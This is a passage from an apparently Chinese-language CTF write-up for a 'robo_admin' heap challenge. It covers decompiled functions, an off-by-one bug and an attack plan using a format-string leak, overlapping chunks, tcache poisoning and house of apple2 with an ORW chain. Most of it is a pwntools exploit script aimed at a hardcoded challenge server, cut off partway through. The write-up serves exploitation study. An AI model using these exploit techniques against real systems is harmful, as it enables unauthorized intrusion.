class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[+] task updated&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] read failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] empty&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>发现 off-by-one 漏洞,然后写入的内容末尾会补一个 &lsquo;\x00&rsquo; ,阻挠进一步的泄露</p> <h4 id="delete">delete </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">delete</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">result</span><span class="p">;</span> <span class="c1">// eax </span></span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="nf">readidx</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">result</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">taskalive</span><span class="p">[</span><span class="n">result</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">free</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">task_desc</span><span class="p">[</span><span class="n">result</span><span class="p">]);</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">task_size</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">task_name</span> <span class="o">+</span> <span class="mi">24</span> <span class="o">*</span> <span class="n">v1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x18u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">taskalive</span><span class="p">[</span><span class="n">v1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[+] deleted&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] empty&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>没有 UAF</p> <h3 id="攻击思路-1">攻击思路 </h3><p>利用格式化字符串获取管理员权限后,就是 off-by-one 的利用了</p> <p>准备三个相邻 chunk A, B, C ,从低地址到高地址排列</p> <p>利用 A 的 off-by-one 漏洞使 B 恰好包括住 C ,然后 free 掉 B 使之进入 unsortedbin</p> <p>申请原来的 B 的大小的 chunk ,使 unsortedbin 剩下 lastremainder C ,然后再申请 C 的大小,这样就获得了两个指向同一个 chunk 的堆指针</p> <p>最后 free 掉其中一个指针,就可以达成 UAF 的效果,leak heap 后用 tcache poisoning 打 house of apple2 写 orw 链即可</p> <p>不过 chunk 的大小还要精心选择一波,在开始利用之前需要做一下堆风水使 B 能进入 unsortedbin</p> <p>吐槽一下这初始的堆环境是有够恶劣的。。。</p> <h3 id="exp-1">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span><span class="lnt">137 </span><span class="lnt">138 </span><span class="lnt">139 </span><span class="lnt">140 </span><span class="lnt">141 </span><span class="lnt">142 </span><span class="lnt">143 </span><span class="lnt">144 </span><span class="lnt">145 </span><span class="lnt">146 </span><span class="lnt">147 </span><span class="lnt">148 </span><span class="lnt">149 </span><span class="lnt">150 </span><span class="lnt">151 </span><span class="lnt">152 </span><span class="lnt">153 </span><span class="lnt">154 </span><span class="lnt">155 </span><span class="lnt">156 </span><span class="lnt">157 </span><span class="lnt">158 </span><span class="lnt">159 </span><span class="lnt">160 </span><span class="lnt">161 </span><span class="lnt">162 </span><span class="lnt">163 </span><span class="lnt">164 </span><span class="lnt">165 </span><span class="lnt">166 </span><span class="lnt">167 </span><span class="lnt">168 </span><span class="lnt">169 </span><span class="lnt">170 </span><span class="lnt">171 </span><span class="lnt">172 </span><span class="lnt">173 </span><span class="lnt">174 </span><span class="lnt">175 </span><span class="lnt">176 </span><span class="lnt">177 </span><span class="lnt">178 </span><span class="lnt">179 </span><span class="lnt">180 </span><span class="lnt">181 </span><span class="lnt">182 </span><span class="lnt">183 </span><span class="lnt">184 </span><span class="lnt">185 </span><span class="lnt">186 </span><span class="lnt">187 </span><span class="lnt">188 </span><span class="lnt">189 </span><span class="lnt">190 </span><span class="lnt">191 </span><span class="lnt">192 </span><span class="lnt">193 </span><span class="lnt">194 </span><span class="lnt">195 </span><span class="lnt">196 </span><span class="lnt">197 </span><span class="lnt">198 </span><span class="lnt">199 </span><span class="lnt">200 </span><span class="lnt">201 </span><span class="lnt">202 </span><span class="lnt">203 </span><span class="lnt">204 </span><span class="lnt">205 </span><span class="lnt">206 </span><span class="lnt">207 </span><span class="lnt">208 </span><span class="lnt">209 </span><span class="lnt">210 </span><span class="lnt">211 </span><span class="lnt">212 </span><span class="lnt">213 </span><span class="lnt">214 </span><span class="lnt">215 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">os</span> <span class="o">=</span> <span class="s1">&#39;linux&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">file</span> <span class="o">=</span> <span class="s1">&#39;./robo_admin_patched&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s1">&#39;60.205.163.215&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">13774</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">file</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">dbg</span><span class="p">(</span><span class="n">cmd</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">gdbscript</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sa</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sla</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">data</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">rl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">num</span><span class="o">=</span><span class="mi">4096</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">num</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">itr</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">uu32</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u32</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uu64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">data</span> <span class="p">:</span><span class="n">u64</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">uru64</span> <span class="o">=</span> <span class="k">lambda</span> <span class="p">:</span><span class="n">uu64</span><span class="p">(</span><span class="n">ru</span><span class="p">(</span><span class="s1">&#39;</span><span class="se">\x7f</span><span class="s1">&#39;</span><span class="p">)[</span><span class="o">-</span><span class="mi">6</span><span class="p">:])</span> </span></span><span class="line"><span class="cl"><span class="n">leak</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">name</span> <span class="p">:</span><span class="n">log</span><span class="o">.</span><span class="n">success</span><span class="p">(</span><span class="n">name</span> <span class="o">+</span> <span class="s1">&#39; = &#39;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">eval</span><span class="p">(</span><span class="n">name</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">encoder</span><span class="p">(</span><span class="n">text</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="nb">str</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">text</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">&#39;%&#39;</span> <span class="ow">or</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">&#39;$&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">+=</span> <span class="s1">&#39;</span><span class="se">\\</span><span class="s1">&#39;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">i</span><span class="p">))[</span><span class="mi">1</span><span class="p">:]</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">+=</span> <span class="n">i</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">result</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">safelinking</span><span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="n">ptr</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">pos</span> <span class="o">&gt;&gt;</span> <span class="mi">12</span><span class="p">)</span> <span class="o">^</span> <span class="n">ptr</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">decodenext</span><span class="p">(</span><span class="n">x</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">a</span> <span class="o">=</span> <span class="n">x</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">12</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">x</span> <span class="o">=</span> <span class="n">a</span> <span class="o">^</span> <span class="p">(</span><span class="n">x</span> <span class="o">&gt;&gt;</span> <span class="mi">12</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">x</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">setnotice</span><span class="p">(</span><span class="n">notice</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span><span class="p">(</span><span class="n">notice</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">showstatus</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">admin_login</span><span class="p">(</span><span class="n">pwd</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Token:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;ROBOADMIN&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Password (32 hex):</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">exit</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">createtask</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;name:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;size:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">size</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">edittask</span><span class="p">(</span><span class="n">idx</span><span class="p">,</span> <span class="n">length</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;length :</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">length</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;bytes:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">content</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">querytask</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">deletetask</span><span class="p">(</span><span class="n">idx</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;5&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Index:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">idx</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">logout</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">sla</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt; </span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">setnotice</span><span class="p">(</span><span class="n">encoder</span><span class="p">(</span><span class="s1">&#39;%6$016p%7$016p%23$p&#39;</span><span class="p">))</span> <span class="c1"># leak pwd, libc</span> </span></span><span class="line"><span class="cl"><span class="n">showstatus</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Notice: &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pwd</span> <span class="o">=</span> <span class="n">r</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">pwd</span> <span class="o">+=</span> <span class="n">r</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">r</span><span class="p">(</span><span class="mi">12</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span 